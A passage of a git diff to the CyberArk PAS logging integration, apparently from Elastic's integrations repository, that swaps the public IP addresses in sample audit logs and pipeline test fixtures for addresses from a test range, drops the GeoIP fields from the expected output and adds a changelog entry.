09:38:13","IsoTimestamp":"2021-03-11T17:38:13Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"Administrator","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":"67.43.156.13"}}} +<5>1 2021-03-11T17:48:28Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:48:28\n 2021-03-11T17:48:28Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 8\n Logoff\n Info\n Administrator\n Logoff\n \n \n \n \n 10.0.2.2\n \n \n \n \n \n Logoff\n 67.43.156.13\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:48:28","IsoTimestamp":"2021-03-11T17:48:28Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"Administrator","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"10.0.2.2","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":"67.43.156.13"}}} +<5>1 2021-03-11T17:49:06Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:49:06\n 2021-03-11T17:49:06Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 8\n Logoff\n Info\n PSMPGW_VAGRANT\n Logoff\n \n \n \n \n 67.43.156.13\n \n \n \n \n \n Logoff\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:49:06","IsoTimestamp":"2021-03-11T17:49:06Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"PSMPGW_VAGRANT","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}} +<5>1 2021-03-14T12:57:20Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:20\n 2021-03-14T12:57:20Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 8\n Logoff\n Info\n Administrator\n Logoff\n \n \n \n \n 67.43.156.15\n \n \n \n \n \n Logoff\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:20","IsoTimestamp":"2021-03-14T12:57:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"Administrator","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":""}}} +<5>1 2021-03-14T13:49:36Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:49:36\n 2021-03-14T13:49:36Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 8\n Logoff\n Info\n Administrator\n Logoff\n \n \n \n \n 67.43.156.13\n \n \n \n \n \n Logoff\n 67.43.156.15\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:49:36","IsoTimestamp":"2021-03-14T13:49:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"8","Desc":"Logoff","Severity":"Info","Issuer":"Administrator","Action":"Logoff","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Logoff","GatewayStation":"67.43.156.15"}}} diff --git a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/98_open_file_write_only.log b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/98_open_file_write_only.log index f3062f7ea56..a0bb4b16a06 100644 --- a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/98_open_file_write_only.log +++ b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/98_open_file_write_only.log @@ -1,4 +1,4 @@ <5>1 2021-03-08T18:24:50Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 08 10:24:50","IsoTimestamp":"2021-03-08T18:24:50Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"98","Desc":"Open File (Write Only)","Severity":"Info","Issuer":"PVWAAppUser","Action":"Open File (Write Only)","SourceUser":"","TargetUser":"","Safe":"PVWAPrivateUserPrefs","File":"Root\\YWRtaW5pc3RyYXRvcg==","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Open File (Write Only)","GatewayStation":""}}} -<5>1 2021-03-10T18:44:08Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:44:08","IsoTimestamp":"2021-03-10T18:44:08Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"98","Desc":"Open File (Write Only)","Severity":"Info","Issuer":"Administrator","Action":"Open File (Write Only)","SourceUser":"","TargetUser":"","Safe":"PVWAConfig","File":"ROOT\\PVConfiguration.xml","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Open File (Write Only)","GatewayStation":""}}} -<5>1 2021-03-10T22:17:40Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:17:40","IsoTimestamp":"2021-03-10T22:17:40Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"98","Desc":"Open File (Write Only)","Severity":"Info","Issuer":"Administrator","Action":"Open File (Write Only)","SourceUser":"","TargetUser":"","Safe":"PVWAConfig","File":"ROOT\\PVConfiguration.xml","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Open File (Write Only)","GatewayStation":""}}} +<5>1 2021-03-10T18:44:08Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:44:08","IsoTimestamp":"2021-03-10T18:44:08Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"98","Desc":"Open File (Write Only)","Severity":"Info","Issuer":"Administrator","Action":"Open File (Write Only)","SourceUser":"","TargetUser":"","Safe":"PVWAConfig","File":"ROOT\\PVConfiguration.xml","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Open File (Write Only)","GatewayStation":""}}} +<5>1 2021-03-10T22:17:40Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:17:40","IsoTimestamp":"2021-03-10T22:17:40Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"98","Desc":"Open File (Write Only)","Severity":"Info","Issuer":"Administrator","Action":"Open File (Write Only)","SourceUser":"","TargetUser":"","Safe":"PVWAConfig","File":"ROOT\\PVConfiguration.xml","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Open File (Write Only)","GatewayStation":""}}} <5>1 2021-03-11T19:45:26Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 11:45:26\n 2021-03-11T19:45:26Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 98\n Open File (Write Only)\n Info\n Administrator\n Open File (Write Only)\n \n \n PVWAConfig\n Root\\PVConfiguration.xml\n 127.0.0.1\n \n \n \n \n \n Open File (Write Only)\n 10.0.1.20\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 11:45:26","IsoTimestamp":"2021-03-11T19:45:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"98","Desc":"Open File (Write Only)","Severity":"Info","Issuer":"Administrator","Action":"Open File (Write Only)","SourceUser":"","TargetUser":"","Safe":"PVWAConfig","File":"Root\\PVConfiguration.xml","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Open File (Write Only)","GatewayStation":"10.0.1.20"}}} diff --git a/packages/cyberarkpas/changelog.yml b/packages/cyberarkpas/changelog.yml index 9d610fca55f..5a3e270afb0 100644 --- a/packages/cyberarkpas/changelog.yml +++ b/packages/cyberarkpas/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "2.2.1" + changes: + - description: Change test public IPs to the supported subset + type: bugfix + link: https://github.com/elastic/integrations/pull/2327 - version: "2.2.0" changes: - description: Add 8.0.0 version constraint diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-105-add-file-category.log b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-105-add-file-category.log index cb662d0ec48..5c630248bf1 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-105-add-file-category.log +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-105-add-file-category.log @@ -1,6 +1,6 @@ <5>1 2021-03-08T18:24:49Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 08 10:24:49","IsoTimestamp":"2021-03-08T18:24:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"105","Desc":"Add File Category","Severity":"Info","Issuer":"Administrator","Action":"Add File Category","SourceUser":"","TargetUser":"","Safe":"Test","File":"Root\\Operating System-WinDesktopLocal-Address-adriansr","Station":"127.0.0.1","Location":"","Category":"Address","RequestId":"","Reason":"Value=[Address]","ExtraDetails":"","Message":"Add File Category","GatewayStation":"10.0.1.20"}}} -<5>1 2021-03-10T09:11:54Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:54","IsoTimestamp":"2021-03-10T09:11:54Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"105","Desc":"Add File Category","Severity":"Info","Issuer":"PSMPApp_localhost.localdomain","Action":"Add File Category","SourceUser":"","TargetUser":"","Safe":"PSMPLiveSessions","File":"Root\\PSMPApp_localhost.localdomain.LiveSessions","Station":"81.32.170.205","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add File Category","GatewayStation":""}}} -<5>1 2021-03-10T18:46:48Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:46:48","IsoTimestamp":"2021-03-10T18:46:48Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"105","Desc":"Add File Category","Severity":"Info","Issuer":"PSMApp_VAGRANT","Action":"Add File Category","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSMServer.LiveSessions","Station":"81.32.170.205","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add File Category","GatewayStation":""}}} -<5>1 2021-03-10T22:17:26Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:17:26","IsoTimestamp":"2021-03-10T22:17:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"105","Desc":"Add File Category","Severity":"Info","Issuer":"Administrator","Action":"Add File Category","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\PSM-ASR-CYBERARK-WI","Station":"35.192.121.42","Location":"","Category":"LogonDomain","RequestId":"","Reason":"Value=[ASR-CYBERARK-WI]","ExtraDetails":"","Message":"Add File Category","GatewayStation":""}}} -<5>1 2021-03-10T22:20:12Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:20:12","IsoTimestamp":"2021-03-10T22:20:12Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"105","Desc":"Add File Category","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Add File Category","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSM-ASR-CYBERARK-WI.LiveSessions","Station":"35.192.121.42","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add File Category","GatewayStation":""}}} -<5>1 2021-03-11T16:59:58Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:58\n 2021-03-11T16:59:58Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 105\n Add File Category\n Info\n PSMPApp_VAGRANT\n Add File Category\n \n \n PSMPLiveSessions\n Root\\PSMPApp_VAGRANT.LiveSessions\n 81.32.170.205\n \n _PSMLiveSessions_1\n \n \n \n Add File Category\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:58","IsoTimestamp":"2021-03-11T16:59:58Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"105","Desc":"Add File Category","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Add File Category","SourceUser":"","TargetUser":"","Safe":"PSMPLiveSessions","File":"Root\\PSMPApp_VAGRANT.LiveSessions","Station":"81.32.170.205","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add File Category","GatewayStation":""}}} +<5>1 2021-03-10T09:11:54Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:54","IsoTimestamp":"2021-03-10T09:11:54Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"105","Desc":"Add File Category","Severity":"Info","Issuer":"PSMPApp_localhost.localdomain","Action":"Add File Category","SourceUser":"","TargetUser":"","Safe":"PSMPLiveSessions","File":"Root\\PSMPApp_localhost.localdomain.LiveSessions","Station":"67.43.156.13","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add File Category","GatewayStation":""}}} +<5>1 2021-03-10T18:46:48Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:46:48","IsoTimestamp":"2021-03-10T18:46:48Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"105","Desc":"Add File Category","Severity":"Info","Issuer":"PSMApp_VAGRANT","Action":"Add File Category","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSMServer.LiveSessions","Station":"67.43.156.13","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add File Category","GatewayStation":""}}} +<5>1 2021-03-10T22:17:26Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:17:26","IsoTimestamp":"2021-03-10T22:17:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"105","Desc":"Add File Category","Severity":"Info","Issuer":"Administrator","Action":"Add File Category","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\PSM-ASR-CYBERARK-WI","Station":"67.43.156.14","Location":"","Category":"LogonDomain","RequestId":"","Reason":"Value=[ASR-CYBERARK-WI]","ExtraDetails":"","Message":"Add File Category","GatewayStation":""}}} +<5>1 2021-03-10T22:20:12Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:20:12","IsoTimestamp":"2021-03-10T22:20:12Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"105","Desc":"Add File Category","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Add File Category","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSM-ASR-CYBERARK-WI.LiveSessions","Station":"67.43.156.14","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add File Category","GatewayStation":""}}} +<5>1 2021-03-11T16:59:58Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:58\n 2021-03-11T16:59:58Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 105\n Add File Category\n Info\n PSMPApp_VAGRANT\n Add File Category\n \n \n PSMPLiveSessions\n Root\\PSMPApp_VAGRANT.LiveSessions\n 67.43.156.13\n \n _PSMLiveSessions_1\n \n \n \n Add File Category\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:58","IsoTimestamp":"2021-03-11T16:59:58Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"105","Desc":"Add File Category","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Add File Category","SourceUser":"","TargetUser":"","Safe":"PSMPLiveSessions","File":"Root\\PSMPApp_VAGRANT.LiveSessions","Station":"67.43.156.13","Location":"","Category":"_PSMLiveSessions_1","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add File Category","GatewayStation":""}}} diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-105-add-file-category.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-105-add-file-category.log-expected.json index 172f8e5ba34..fac8bcfa4dd 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-105-add-file-category.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-105-add-file-category.log-expected.json @@ -63,7 +63,7 @@ "event": { "severity": 2, "action": "add file category", - "ingested": "2021-06-09T10:24:27.789413200Z", + "ingested": "2021-12-09T13:36:36.022887100Z", "original": "\u003c5\u003e1 2021-03-08T18:24:49Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 10:24:49\",\"IsoTimestamp\":\"2021-03-08T18:24:49Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"105\",\"Desc\":\"Add File Category\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add File Category\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Operating System-WinDesktopLocal-Address-adriansr\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"Address\",\"RequestId\":\"\",\"Reason\":\"Value=[Address]\",\"ExtraDetails\":\"\",\"Message\":\"Add File Category\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "105", "kind": "event" @@ -76,20 +76,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -109,7 +97,7 @@ }, "related": { "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -119,7 +107,7 @@ "iso_timestamp": "2021-03-10T09:11:54Z", "file": "Root\\PSMPApp_localhost.localdomain.LiveSessions", "safe": "PSMPLiveSessions", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Add File Category", "message": "Add File Category", "category": "_PSMLiveSessions_1", @@ -134,8 +122,8 @@ "event": { "severity": 2, "action": "add file category", - "ingested": "2021-06-09T10:24:27.789440300Z", - "original": "\u003c5\u003e1 2021-03-10T09:11:54Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:54\",\"IsoTimestamp\":\"2021-03-10T09:11:54Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"105\",\"Desc\":\"Add File Category\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_localhost.localdomain\",\"Action\":\"Add File Category\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMPLiveSessions\",\"File\":\"Root\\\\PSMPApp_localhost.localdomain.LiveSessions\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"_PSMLiveSessions_1\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add File Category\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:36.022896800Z", + "original": "\u003c5\u003e1 2021-03-10T09:11:54Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:54\",\"IsoTimestamp\":\"2021-03-10T09:11:54Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"105\",\"Desc\":\"Add File Category\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_localhost.localdomain\",\"Action\":\"Add File Category\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMPLiveSessions\",\"File\":\"Root\\\\PSMPApp_localhost.localdomain.LiveSessions\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"_PSMLiveSessions_1\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add File Category\",\"GatewayStation\":\"\"}}}", "code": "105", "kind": "event" } @@ -147,20 +135,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -180,7 +156,7 @@ }, "related": { "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -190,7 +166,7 @@ "iso_timestamp": "2021-03-10T18:46:48Z", "file": "Root\\PSMServer.LiveSessions", "safe": "PSMLiveSessions", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Add File Category", "message": "Add File Category", "category": "_PSMLiveSessions_1", @@ -205,8 +181,8 @@ "event": { "severity": 2, "action": "add file category", - "ingested": "2021-06-09T10:24:27.789448Z", - "original": "\u003c5\u003e1 2021-03-10T18:46:48Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:46:48\",\"IsoTimestamp\":\"2021-03-10T18:46:48Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"105\",\"Desc\":\"Add File Category\",\"Severity\":\"Info\",\"Issuer\":\"PSMApp_VAGRANT\",\"Action\":\"Add File Category\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMLiveSessions\",\"File\":\"Root\\\\PSMServer.LiveSessions\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"_PSMLiveSessions_1\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add File Category\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:36.022905400Z", + "original": "\u003c5\u003e1 2021-03-10T18:46:48Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:46:48\",\"IsoTimestamp\":\"2021-03-10T18:46:48Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"105\",\"Desc\":\"Add File Category\",\"Severity\":\"Info\",\"Issuer\":\"PSMApp_VAGRANT\",\"Action\":\"Add File Category\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMLiveSessions\",\"File\":\"Root\\\\PSMServer.LiveSessions\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"_PSMLiveSessions_1\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add File Category\",\"GatewayStation\":\"\"}}}", "code": "105", "kind": "event" } @@ -218,19 +194,8 @@ } }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "country_name": "United States", - "region_name": "Virginia", - "location": { - "lon": -77.2481, - "lat": 38.6583 - }, - "country_iso_code": "US" - }, - "address": "35.192.121.42", - "ip": "35.192.121.42" + "address": "67.43.156.14", + "ip": "67.43.156.14" }, "tags": [ "preserve_original_event" @@ -250,7 +215,7 @@ }, "related": { "ip": [ - "35.192.121.42" + "67.43.156.14" ] }, "cyberarkpas": { @@ -263,7 +228,7 @@ "rfc5424": true, "file": "Root\\PSM-ASR-CYBERARK-WI", "safe": "PSM", - "station": "35.192.121.42", + "station": "67.43.156.14", "action": "Add File Category", "category": "LogonDomain", "timestamp": "Mar 10 14:17:26", @@ -276,8 +241,8 @@ "event": { "severity": 2, "action": "add file category", - "ingested": "2021-06-09T10:24:27.789478800Z", - "original": "\u003c5\u003e1 2021-03-10T22:17:26Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:17:26\",\"IsoTimestamp\":\"2021-03-10T22:17:26Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"105\",\"Desc\":\"Add File Category\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add File Category\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\PSM-ASR-CYBERARK-WI\",\"Station\":\"35.192.121.42\",\"Location\":\"\",\"Category\":\"LogonDomain\",\"RequestId\":\"\",\"Reason\":\"Value=[ASR-CYBERARK-WI]\",\"ExtraDetails\":\"\",\"Message\":\"Add File Category\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:36.022911900Z", + "original": "\u003c5\u003e1 2021-03-10T22:17:26Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:17:26\",\"IsoTimestamp\":\"2021-03-10T22:17:26Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"105\",\"Desc\":\"Add File Category\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add File Category\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\PSM-ASR-CYBERARK-WI\",\"Station\":\"67.43.156.14\",\"Location\":\"\",\"Category\":\"LogonDomain\",\"RequestId\":\"\",\"Reason\":\"Value=[ASR-CYBERARK-WI]\",\"ExtraDetails\":\"\",\"Message\":\"Add File Category\",\"GatewayStation\":\"\"}}}", "code": "105", "kind": "event" } @@ -289,19 +254,8 @@ } }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "country_name": "United States", - "region_name": "Virginia", - "location": { - "lon": -77.2481, - "lat": 38.6583 - }, - "country_iso_code": "US" - }, - "address": "35.192.121.42", - "ip": "35.192.121.42" + "address": "67.43.156.14", + "ip": "67.43.156.14" }, "tags": [ "preserve_original_event" @@ -321,7 +275,7 @@ }, "related": { "ip": [ - "35.192.121.42" + "67.43.156.14" ] }, "cyberarkpas": { @@ -331,7 +285,7 @@ "iso_timestamp": "2021-03-10T22:20:12Z", "file": "Root\\PSM-ASR-CYBERARK-WI.LiveSessions", "safe": "PSMLiveSessions", - "station": "35.192.121.42", + "station": "67.43.156.14", "action": "Add File Category", "message": "Add File Category", "category": "_PSMLiveSessions_1", @@ -346,8 +300,8 @@ "event": { "severity": 2, "action": "add file category", - "ingested": "2021-06-09T10:24:27.789486200Z", - "original": "\u003c5\u003e1 2021-03-10T22:20:12Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 